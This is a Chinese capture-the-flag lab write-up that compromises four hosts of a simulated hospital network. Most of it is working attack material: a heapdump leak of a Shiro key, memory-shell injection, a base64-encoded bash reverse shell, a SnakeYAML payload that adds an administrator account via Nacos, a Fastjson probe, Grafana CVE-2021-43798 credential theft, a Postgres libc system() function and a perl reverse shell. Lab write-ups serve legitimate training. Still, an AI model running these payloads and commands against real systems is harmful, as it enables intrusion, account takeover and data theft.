描述:在这个场景中,你将扮演一名渗透测试工程师,被派遣去测试某家医院的网络安全性。你的目标是成功获取所有服务器的权限,以评估公司的网络安全状况。该靶场共有 4 个 flag,分布于不同的靶机。

标签:内网渗透、Nacos、Shiro、Fastjson、Decrypt

难度:简单

内网地址 Host or FQDN 简要描述
172.30.12.5 Web01 Spring + Shiro
172.30.12.6 Server02 Nacos
172.30.12.236 172.30.54.179 Web03 Fastjson
172.30.54.12 Web04 Grafana + Postgresql

flag1 入口-172.30.12.5

fscan起手

image-20250423140523339

1
http://39.99.147.102/actuator/heapdump

下载到heapdump文件

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
E:\小工具\JDDump>java -jar JDumpSpider-1.1-SNAPSHOT-full.jar C:\Users\31702\Downloads\heapdump
===========================================
SpringDataSourceProperties
-------------
not found!

===========================================
WeblogicDataSourceConnectionPoolConfig
-------------
not found!

===========================================
MongoClient
-------------
not found!

===========================================
AliDruidDataSourceWrapper
-------------
not found!

===========================================
HikariDataSource
-------------
not found!

===========================================
RedisStandaloneConfiguration
-------------
not found!

===========================================
JedisClient
-------------
not found!

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = CBC, key = GAYysgMQhG7/CzIJlVpR2g==, algName = AES

===========================================
OriginTrackedMapPropertySource
-------------
management.endpoints.web.exposure.include = *
server.port = 8080
spring.thymeleaf.prefix = classpath:/templates/

===========================================
MutablePropertySources
-------------
awt.toolkit = sun.awt.X11.XToolkit
sun.boot.class.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/resources.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/rt.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jsse.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jce.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/charsets.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jfr.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/classes
java.protocol.handler.pkgs = org.springframework.boot.loader
sun.management.compiler = HotSpot 64-Bit Tiered Compilers
sun.cpu.isalist =
sun.jnu.encoding = UTF-8
java.runtime.version = 1.8.0_392-8u392-ga-1~20.04-b08
java.class.path = /app/login-1.0-SNAPSHOT.jar
path.separator = :
java.vm.vendor = Private Build
os.version = 5.4.0-164-generic
java.endorsed.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/endorsed
java.runtime.name = OpenJDK Runtime Environment
file.encoding = UTF-8
catalina.useNaming = false
spring.beaninfo.ignore = true
java.vm.specification.version = 1.8
os.name = Linux
java.vm.name = OpenJDK 64-Bit Server VM
local.server.port = null
user.country = US
java.vendor.url.bug = http://bugreport.sun.com/bugreport/
sun.java.command = /app/login-1.0-SNAPSHOT.jar
java.io.tmpdir = /tmp
catalina.home = /tmp/tomcat.5583964768902277512.8080
java.version = 1.8.0_392
user.home = /home/app
user.language = en
PID = 751
java.awt.printerjob = sun.print.PSPrinterJob
file.separator = /
catalina.base = /tmp/tomcat.5583964768902277512.8080
java.vm.info = mixed mode
java.specification.name = Java Platform API Specification
java.vm.specification.vendor = Oracle Corporation
java.awt.graphicsenv = sun.awt.X11GraphicsEnvironment
java.awt.headless = true
sun.io.unicode.encoding = UnicodeLittle
java.ext.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ext:/usr/java/packages/lib/ext

===========================================
MapPropertySources
-------------
local.server.port = null

===========================================
ConsulPropertySources
-------------
not found!

===========================================
JavaProperties
-------------
java.util.logging.FileHandler.pattern = %h/java%u.log
awt.toolkit = sun.awt.X11.XToolkit
sun.cpu.isalist =
sun.jnu.encoding = UTF-8
sun.arch.data.model = 64
catalina.useNaming = false
security.overridePropertiesFile = true
security.provider.7 = com.sun.security.sasl.Provider
sun.boot.library.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/amd64
sun.java.command = /app/login-1.0-SNAPSHOT.jar
security.provider.9 = sun.security.smartcardio.SunPCSC
java.specification.vendor = Oracle Corporation
security.provider.1 = sun.security.provider.Sun
security.provider.2 = sun.security.rsa.SunRsaSign
security.provider.3 = sun.security.ec.SunEC
networkaddress.cache.negative.ttl = 10
security.provider.4 = com.sun.net.ssl.internal.ssl.Provider
security.provider.5 = com.sun.crypto.provider.SunJCE
security.provider.6 = sun.security.jgss.SunProvider
file.separator = /
org.springframework.web.servlet.HandlerExceptionResolver = org.springframework.web.servlet.mvc.method.annotation.ExceptionHandlerExceptionResolver,org.springframework.web.servlet.mvc.annotation.ResponseStatusExceptionResolver,org.springframework.web.servlet.mvc.support.DefaultHandlerExceptionResolver
java.specification.name = Java Platform API Specification
java.vm.specification.vendor = Oracle Corporation
org.springframework.web.servlet.HandlerMapping = org.springframework.web.servlet.handler.BeanNameUrlHandlerMapping,org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping,org.springframework.web.servlet.function.support.RouterFunctionMapping
org.springframework.web.servlet.HandlerAdapter = org.springframework.web.servlet.mvc.HttpRequestHandlerAdapter,org.springframework.web.servlet.mvc.SimpleControllerHandlerAdapter,org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerAdapter,org.springframework.web.servlet.function.support.HandlerFunctionAdapter
org.springframework.web.servlet.FlashMapManager = org.springframework.web.servlet.support.SessionFlashMapManager
package.definition = sun.,com.sun.xml.internal.,com.sun.imageio.,com.sun.istack.internal.,com.sun.jmx.,com.sun.media.sound.,com.sun.naming.internal.,com.sun.proxy.,com.sun.corba.se.,com.sun.org.apache.bcel.internal.,com.sun.org.apache.regexp.internal.,com.sun.org.apache.xerces.internal.,com.sun.org.apache.xpath.internal.,com.sun.org.apache.xalan.internal.extensions.,com.sun.org.apache.xalan.internal.lib.,com.sun.org.apache.xalan.internal.res.,com.sun.org.apache.xalan.internal.templates.,com.sun.org.apache.xalan.internal.utils.,com.sun.org.apache.xalan.internal.xslt.,com.sun.org.apache.xalan.internal.xsltc.cmdline.,com.sun.org.apache.xalan.internal.xsltc.compiler.,com.sun.org.apache.xalan.internal.xsltc.trax.,com.sun.org.apache.xalan.internal.xsltc.util.,com.sun.org.apache.xml.internal.res.,com.sun.org.apache.xml.internal.resolver.helpers.,com.sun.org.apache.xml.internal.resolver.readers.,com.sun.org.apache.xml.internal.security.,com.sun.org.apache.xml.internal.serializer.utils.,com.sun.org.apache.xml.internal.utils.,com.sun.org.glassfish.,com.oracle.xmlns.internal.,com.oracle.webservices.internal.,oracle.jrockit.jfr.,org.jcp.xml.dsig.internal.,jdk.internal.,jdk.nashorn.internal.,jdk.nashorn.tools.,jdk.xml.internal.,com.sun.activation.registries.,jdk.jfr.events.,jdk.jfr.internal.,jdk.management.jfr.internal.
sun.boot.class.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/resources.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/rt.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jsse.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jce.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/charsets.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jfr.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/classes
java.protocol.handler.pkgs = org.springframework.boot.loader
sun.management.compiler = HotSpot 64-Bit Tiered Compilers
org.springframework.web.servlet.ThemeResolver = org.springframework.web.servlet.theme.FixedThemeResolver
java.runtime.version = 1.8.0_392-8u392-ga-1~20.04-b08
user.name = app
policy.url.1 = file:${java.home}/lib/security/java.policy
securerandom.source = file:/dev/random
policy.url.2 = file:${user.home}/.java.policy
jdk.tls.disabledAlgorithms = SSLv3, TLSv1, TLSv1.1, RC4, DES, MD5withRSA, DH keySize < 1024, EC keySize < 224, 3DES_EDE_CBC, anon, NULL, include jdk.disabled.namedCurves
policy.ignoreIdentityScope = false
file.encoding = UTF-8
java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter
jdk.sasl.disabledMechanisms =
java.io.tmpdir = /tmp
org.springframework.web.servlet.ViewResolver = org.springframework.web.servlet.view.InternalResourceViewResolver
java.version = 1.8.0_392
jdk.tls.keyLimits = AES/GCM/NoPadding KeyUpdate 2^37
PID = 751
java.vm.specification.name = Java Virtual Machine Specification
java.awt.printerjob = sun.print.PSPrinterJob
jdk.xml.dsig.secureValidationPolicy = disallowAlg http://www.w3.org/TR/1999/REC-xslt-19991116,disallowAlg http://www.w3.org/2001/04/xmldsig-more#rsa-md5,disallowAlg http://www.w3.org/2001/04/xmldsig-more#hmac-md5,disallowAlg http://www.w3.org/2001/04/xmldsig-more#md5,maxTransforms 5,maxReferences 30,disallowReferenceUriSchemes file http https,minKeySize RSA 1024,minKeySize DSA 1024,minKeySize EC 224,noDuplicateIds,noRetrievalMethodLoops
java.library.path = /usr/java/packages/lib/amd64:/usr/lib/x86_64-linux-gnu/jni:/lib/x86_64-linux-gnu:/usr/lib/x86_64-linux-gnu:/usr/lib/jni:/lib:/usr/lib
java.vendor = Private Build
handlers = java.util.logging.ConsoleHandler
java.specification.maintenance.version = 5
sun.io.unicode.encoding = UnicodeLittle
krb5.kdc.bad.policy = tryLast
java.class.path = /app/login-1.0-SNAPSHOT.jar
jdk.security.legacyAlgorithms = SHA1, RSA keySize < 2048, DSA keySize < 2048
java.vm.vendor = Private Build
jdk.disabled.namedCurves = secp112r1, secp112r2, secp128r1, secp128r2, secp160k1, secp160r1, secp160r2, secp192k1, secp192r1, secp224k1, secp224r1, secp256k1, sect113r1, sect113r2, sect131r1, sect131r2, sect163k1, sect163r1, sect163r2, sect193r1, sect193r2, sect233k1, sect233r1, sect239k1, sect283k1, sect283r1, sect409k1, sect409r1, sect571k1, sect571r1, X9.62 c2tnb191v1, X9.62 c2tnb191v2, X9.62 c2tnb191v3, X9.62 c2tnb239v1, X9.62 c2tnb239v2, X9.62 c2tnb239v3, X9.62 c2tnb359v1, X9.62 c2tnb431r1, X9.62 prime192v2, X9.62 prime192v3, X9.62 prime239v1, X9.62 prime239v2, X9.62 prime239v3, brainpoolP256r1, brainpoolP320r1, brainpoolP384r1, brainpoolP512r1
crypto.policy = unlimited
jceks.key.serialFilter = java.lang.Enum;java.security.KeyRep;java.security.KeyRep$Type;javax.crypto.spec.SecretKeySpec;!*
login.configuration.provider = sun.security.provider.ConfigFile
user.timezone =
java.vm.specification.version = 1.8
os.name = Linux
user.country = US
jdk.security.caDistrustPolicies = SYMANTEC_TLS
sun.cpu.endian = little
user.home = /home/app
user.language = en
en = UTF-8
jdk.tls.alpnCharset = ISO_8859_1
ssl.KeyManagerFactory.algorithm = SunX509
.level = INFO
java.awt.graphicsenv = sun.awt.X11GraphicsEnvironment
java.awt.headless = true
com.xyz.foo.level = SEVERE
policy.provider = sun.security.provider.PolicyFile
path.separator = :
fr = UTF-8
os.version = 5.4.0-164-generic
java.endorsed.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/endorsed
java.runtime.name = OpenJDK Runtime Environment
keystore.type.compat = true
org.springframework.web.servlet.RequestToViewNameTranslator = org.springframework.web.servlet.view.DefaultRequestToViewNameTranslator
spring.beaninfo.ignore = true
java.vm.name = OpenJDK 64-Bit Server VM
java.vendor.url.bug = http://bugreport.sun.com/bugreport/
java.util.logging.FileHandler.formatter = java.util.logging.XMLFormatter
java.util.logging.FileHandler.count = 1
catalina.home = /tmp/tomcat.5583964768902277512.8080
sun.cds.enableSharedLookupCache = false
sun.security.krb5.maxReferrals = 5
catalina.base = /tmp/tomcat.5583964768902277512.8080
java.util.logging.FileHandler.limit = 50000
java.vm.info = mixed mode, sharing
keystore.type = jks
java.ext.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ext:/usr/java/packages/lib/ext
policy.expandProperties = true
securerandom.strongAlgorithms = NativePRNGBlocking:SUN

===========================================
ProcessEnvironment
-------------
not found!

===========================================
OSS
-------------
not found!

===========================================
UserPassSearcher
-------------
org.apache.shiro.web.filter.authc.FormAuthenticationFilter:
[failureKeyAttribute = shiroLoginFailure, loginUrl = /login, successUrl = /, usernameParam = username, passwordParam = password]

org.apache.catalina.startup.Tomcat:
[hostname = localhost]


===========================================
CookieThief
-------------
not found!

===========================================
AuthThief
-------------
not found!

===========================================

image-20250423134951443

注入内存马

image-20250423141533596

反弹shell

1
bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC95b3VyX2lwLzUwMDAgMD4mMQ==}|{base64,-d}|{bash,-i}'

image-20250423141933820

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
app@web01:~$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/vim.basic
/usr/bin/su
/usr/bin/newgrp
/usr/bin/staprun
/usr/bin/at
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/umount
/usr/bin/chfn
/usr/bin/stapbpf
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/mount
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device

有/usr/bin/vim.basic,写公钥ssh连接

image-20250423143210981

image-20250423143159916

拿到flag1

image-20250423143252284

传如fscan开扫

image-20250423143621429

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
root@web01:/tmp# ./fscan -h 172.30.12.5/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-23 15:17:41] [INFO] 暴力破解线程数: 1
[2025-04-23 15:17:41] [INFO] 开始信息扫描
[2025-04-23 15:17:42] [INFO] CIDR范围: 172.30.12.0-172.30.12.255
[2025-04-23 15:17:42] [INFO] 生成IP范围: 172.30.12.0.%!d(string=172.30.12.255) - %!s(MISSING).%!d(MISSING)
[2025-04-23 15:17:42] [INFO] 解析CIDR 172.30.12.5/24 -> IP范围 172.30.12.0-172.30.12.255
[2025-04-23 15:17:42] [INFO] 最终有效主机数量: 256
[2025-04-23 15:17:42] [INFO] 开始主机扫描
[2025-04-23 15:17:42] [SUCCESS] 目标 172.30.12.5     存活 (ICMP)
[2025-04-23 15:17:42] [SUCCESS] 目标 172.30.12.6     存活 (ICMP)
[2025-04-23 15:17:42] [SUCCESS] 目标 172.30.12.236   存活 (ICMP)
[2025-04-23 15:17:45] [INFO] 存活主机数量: 3
[2025-04-23 15:17:45] [INFO] 有效端口数量: 233
[2025-04-23 15:17:45] [SUCCESS] 端口开放 172.30.12.6:135
[2025-04-23 15:17:45] [SUCCESS] 端口开放 172.30.12.6:139
[2025-04-23 15:17:45] [SUCCESS] 端口开放 172.30.12.6:445
[2025-04-23 15:17:45] [SUCCESS] 端口开放 172.30.12.236:22
[2025-04-23 15:17:45] [SUCCESS] 端口开放 172.30.12.5:22
[2025-04-23 15:17:45] [SUCCESS] 端口开放 172.30.12.236:8009
[2025-04-23 15:17:45] [SUCCESS] 端口开放 172.30.12.236:8080
[2025-04-23 15:17:45] [SUCCESS] 端口开放 172.30.12.5:8080
[2025-04-23 15:17:45] [SUCCESS] 端口开放 172.30.12.6:8848
[2025-04-23 15:17:45] [SUCCESS] 服务识别 172.30.12.236:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-04-23 15:17:45] [SUCCESS] 服务识别 172.30.12.5:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-04-23 15:17:50] [SUCCESS] 服务识别 172.30.12.6:139 =>  Banner:[.]
[2025-04-23 15:17:50] [SUCCESS] 服务识别 172.30.12.6:445 => 
[2025-04-23 15:17:50] [SUCCESS] 服务识别 172.30.12.236:8009 => 
[2025-04-23 15:17:50] [SUCCESS] 服务识别 172.30.12.5:8080 => [http]
[2025-04-23 15:17:51] [SUCCESS] 服务识别 172.30.12.236:8080 => [http]
[2025-04-23 15:17:55] [SUCCESS] 服务识别 172.30.12.6:8848 => [http]
[2025-04-23 15:18:50] [SUCCESS] 服务识别 172.30.12.6:135 => 
[2025-04-23 15:18:50] [INFO] 存活端口数量: 9
[2025-04-23 15:18:50] [INFO] 开始漏洞扫描
[2025-04-23 15:18:50] [INFO] 加载的插件: findnet, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle
[2025-04-23 15:18:50] [SUCCESS] NetInfo 扫描结果
目标主机: 172.30.12.6
主机名: Server02
发现的网络接口:
   IPv4地址:
      └─ 172.30.12.6
[2025-04-23 15:18:50] [SUCCESS] NetBios 172.30.12.6     WORKGROUP\SERVER02            
[2025-04-23 15:18:50] [SUCCESS] 网站标题 http://172.30.12.5:8080   状态码:302 长度:0      标题:无标题 重定向地址: http://172.30.12.5:8080/login;jsessionid=BDEBB22E581B3680D2A730C6323BA0D3
[2025-04-23 15:18:50] [SUCCESS] 网站标题 http://172.30.12.236:8080 状态码:200 长度:3964   标题:医院后台管理平台
[2025-04-23 15:18:50] [SUCCESS] 网站标题 http://172.30.12.6:8848   状态码:404 长度:431    标题:HTTP Status 404 – Not Found
[2025-04-23 15:18:51] [SUCCESS] 网站标题 http://172.30.12.5:8080/login;jsessionid=BDEBB22E581B3680D2A730C6323BA0D3 状态码:200 长度:2005   标题:医疗管理后台
[2025-04-23 15:18:51] [SUCCESS] 目标: http://172.30.12.6:8848
  漏洞类型: poc-yaml-alibaba-nacos
  漏洞名称: 
  详细信息:
        author:AgeloVito
        links:https://blog.csdn.net/caiqiiqi/article/details/112005424
[2025-04-23 15:18:52] [SUCCESS] 目标: http://172.30.12.6:8848
  漏洞类型: poc-yaml-alibaba-nacos-v1-auth-bypass
  漏洞名称: 
  详细信息:
        author:kmahyyg(https://github.com/kmahyyg)
        links:https://github.com/alibaba/nacos/issues/4593
[2025-04-23 15:18:52] [SUCCESS] 目标: http://172.30.12.5:8080
  漏洞类型: poc-yaml-spring-actuator-heapdump-file
  漏洞名称: 
  详细信息:
        author:AgeloVito
        links:https://www.cnblogs.com/wyb628/p/8567610.html

flag2 NacOS-172.30.12.6

image-20250423152138642

弱口令nacos/nacos进入

charonlight (charonlight)

image-20250423152528275

修改artsploit/yaml-payload: A tiny project for generating SnakeYAML deserialization payloads

将exec改成添加admin用户

1
2
3
4
5
6
7
8
public AwesomeScriptEngineFactory() {
    try {
        Runtime.getRuntime().exec("net user yiyi yiyi /add");
        Runtime.getRuntime().exec("net localgroup administrators yiyi /add");
    } catch (IOException e) {
        e.printStackTrace();
    }
}

image-20250423153038276

打包

1
2
3
4
5
6
7
8
9
10
11

E:\小工具\漏洞复现\yaml-payload-master\yaml-payload-master>javac src/artsploit/AwesomeScriptEngineFactory.java

E:\小工具\漏洞复现\yaml-payload-master\yaml-payload-master>jar -cvf yaml-payload.jar -C src/ .
已添加清单
正在添加: artsploit/(输入 = 0) (输出 = 0)(存储了 0%)
正在添加: artsploit/AwesomeScriptEngineFactory.class(输入 = 1674) (输出 = 702)(压缩了 58%)
正在添加: artsploit/AwesomeScriptEngineFactory.java(输入 = 1565) (输出 = 410)(压缩了 73%)
正在忽略条目META-INF/
正在添加: META-INF/services/(输入 = 0) (输出 = 0)(存储了 0%)
正在添加: META-INF/services/javax.script.ScriptEngineFactory(输入 = 36) (输出 = 38)(压缩了 -5%)

image-20250423154230158

rdp连接得到flag2

image-20250423155227715

flag3 医院后台管理平台-172.30.12.236

1
http://172.30.12.236:8080/

Burp 抓取登录包发现发送的为 Json 数据,猜测为 Fastjson

image-20250423144721593

payload

1
{"@type": "java.lang.AutoCloseable"

得到版本

image-20250423144834630

拿bp插件直接上内存马

image-20250423145626541

image-20250423145742748

拿到flag3

image-20250423145838921

flag4 Grafana-172.30.54.12

image-20250423155451470

写公钥方便后续渗透

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
root@web01:~/.ssh# ssh-keygen -t rsa -b 2048 -C "your_email@example.com"
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase): 
Enter same passphrase again: 
Your identification has been saved in /root/.ssh/id_rsa
Your public key has been saved in /root/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:yA38ufRBF9n0rHoPopRFQhM4I4IpT2R6N9HjTGaBTic your_email@example.com
The key's randomart image is:
+---[RSA 2048]----+
| .oo.o.. .+..+.  |
|.o+ EoO +. ....o |
|.+.ooXoo oo o   o|
| ....oo= o +   . |
|      o S . . .  |
|       . o + .   |
|        . + o o  |
|         . . o o |
|          .     .|
+----[SHA256]-----+

image-20250423160045673

拿个fscan扫一下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
root@web03:~# wget http://172.30.12.5:8000/fscan
--2025-04-23 16:02:25--  http://172.30.12.5:8000/fscan
Connecting to 172.30.12.5:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8585724 (8.2M) [application/octet-stream]
Saving to: ‘fscan’

fscan                                            100%[=======================================================================================================>]   8.19M  --.-KB/s    in 0.02s   

2025-04-23 16:02:25 (402 MB/s) - ‘fscan’ saved [8585724/8585724]

root@web03:~# ls
apache-tomcat-8.5.32  flag  fscan
root@web03:~# chmod 777 fscan
root@web03:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:1f:23:06 brd ff:ff:ff:ff:ff:ff
    inet 172.30.12.236/16 brd 172.30.255.255 scope global dynamic eth0
       valid_lft 315356428sec preferred_lft 315356428sec
    inet6 fe80::216:3eff:fe1f:2306/64 scope link 
       valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
    link/ether 00:16:3e:1f:21:9e brd ff:ff:ff:ff:ff:ff
    inet 172.30.54.179/24 brd 172.30.54.255 scope global eth1
       valid_lft forever preferred_lft forever
    inet6 fe80::216:3eff:fe1f:219e/64 scope link 
       valid_lft forever preferred_lft forever
root@web03:~# ./fscan -h 172.30.54.179/24
┌──────────────────────────────────────────────┐
│    ___                              _        │
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
└──────────────────────────────────────────────┘
      Fscan Version: 2.0.0

[2025-04-23 16:02:53] [INFO] 暴力破解线程数: 1
[2025-04-23 16:02:53] [INFO] 开始信息扫描
[2025-04-23 16:02:53] [INFO] CIDR范围: 172.30.54.0-172.30.54.255
[2025-04-23 16:02:53] [INFO] 生成IP范围: 172.30.54.0.%!d(string=172.30.54.255) - %!s(MISSING).%!d(MISSING)
[2025-04-23 16:02:53] [INFO] 解析CIDR 172.30.54.179/24 -> IP范围 172.30.54.0-172.30.54.255
[2025-04-23 16:02:54] [INFO] 最终有效主机数量: 256
[2025-04-23 16:02:54] [INFO] 开始主机扫描
[2025-04-23 16:02:54] [SUCCESS] 目标 172.30.54.179   存活 (ICMP)
[2025-04-23 16:02:54] [SUCCESS] 目标 172.30.54.12    存活 (ICMP)
[2025-04-23 16:02:57] [INFO] 存活主机数量: 2
[2025-04-23 16:02:57] [INFO] 有效端口数量: 233
[2025-04-23 16:02:57] [SUCCESS] 端口开放 172.30.54.12:5432
[2025-04-23 16:02:57] [SUCCESS] 端口开放 172.30.54.12:3000
[2025-04-23 16:02:57] [SUCCESS] 端口开放 172.30.54.12:22
[2025-04-23 16:02:57] [SUCCESS] 端口开放 172.30.54.179:8009
[2025-04-23 16:02:57] [SUCCESS] 端口开放 172.30.54.179:8080
[2025-04-23 16:02:57] [SUCCESS] 端口开放 172.30.54.179:22
[2025-04-23 16:02:57] [SUCCESS] 服务识别 172.30.54.12:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-04-23 16:02:57] [SUCCESS] 服务识别 172.30.54.179:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.9 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9.]
[2025-04-23 16:03:02] [SUCCESS] 服务识别 172.30.54.12:5432 => 
[2025-04-23 16:03:02] [SUCCESS] 服务识别 172.30.54.12:3000 => [http] Banner:[HTTP/1.1 400 Bad Request.Content-Type: text/plain; charset=utf-8.Connection: close.400 Bad Request]
[2025-04-23 16:03:02] [SUCCESS] 服务识别 172.30.54.179:8009 => 
[2025-04-23 16:03:02] [SUCCESS] 服务识别 172.30.54.179:8080 => [http]
[2025-04-23 16:03:02] [INFO] 存活端口数量: 6
[2025-04-23 16:03:02] [INFO] 开始漏洞扫描
[2025-04-23 16:03:02] [INFO] 加载的插件: postgres, ssh, webpoc, webtitle
[2025-04-23 16:03:02] [SUCCESS] 网站标题 http://172.30.54.12:3000  状态码:302 长度:29     标题:无标题 重定向地址: http://172.30.54.12:3000/login
[2025-04-23 16:03:02] [SUCCESS] 网站标题 http://172.30.54.179:8080 状态码:200 长度:3964   标题:医院后台管理平台
[2025-04-23 16:03:03] [SUCCESS] 网站标题 http://172.30.54.12:3000/login 状态码:200 长度:27909  标题:Grafana

frp配置好后通过 Proxifier 配置代理链

image-20250423162532057

image-20250423162616014

admin/admin可以登录

image-20250423162755768

CVE-2021-43798

image-20250423163633092

1
2
3
4
5
6
root@web03:/tmp# ./grafanaExp_linux_amd64 exp -u http://172.30.54.12:3000
2024/01/26 10:00:02 Target vulnerable has plugin [alertlist]
2024/01/26 10:00:02 Got secret_key [SW2YcwTIb9zpOOhoPsMm]
2024/01/26 10:00:02 There is [0] records in db.
2024/01/26 10:00:02 type:[postgres]     name:[PostgreSQL]               url:[localhost:5432]    user:[postgres] password[Postgres@123]  database:[postgres]     basic_auth_user:[]      basic_auth_password:[]
2024/01/26 10:00:02 All Done, have nice day!

得到账号密码连接

image-20250423165837947

调用系统的动态链接库 libc.so.6 来实现命令执行

1
CREATE OR REPLACE FUNCTION system (cstring) RETURNS integer AS '/lib/x86_64-linux-gnu/libc.so.6', 'system' LANGUAGE 'c' STRICT

使用 perl 反弹 shell

1
select system('perl -e \'use Socket;$i="172.30.54.179";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};\'');

image-20250423171153724

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
postgres@web04:/usr/local/pgsql/data$ sudo -l
sudo -l
Matching Defaults entries for postgres on web04:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User postgres may run the following commands on web04:
    (ALL) NOPASSWD: /usr/local/postgresql/bin/psql
postgres@web04:/usr/local/pgsql/data$ find / -perm -u=s -type f 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
/usr/bin/su
/usr/bin/newgrp
/usr/bin/staprun
/usr/bin/at
/usr/bin/passwd
/usr/bin/gpasswd
/usr/bin/umount
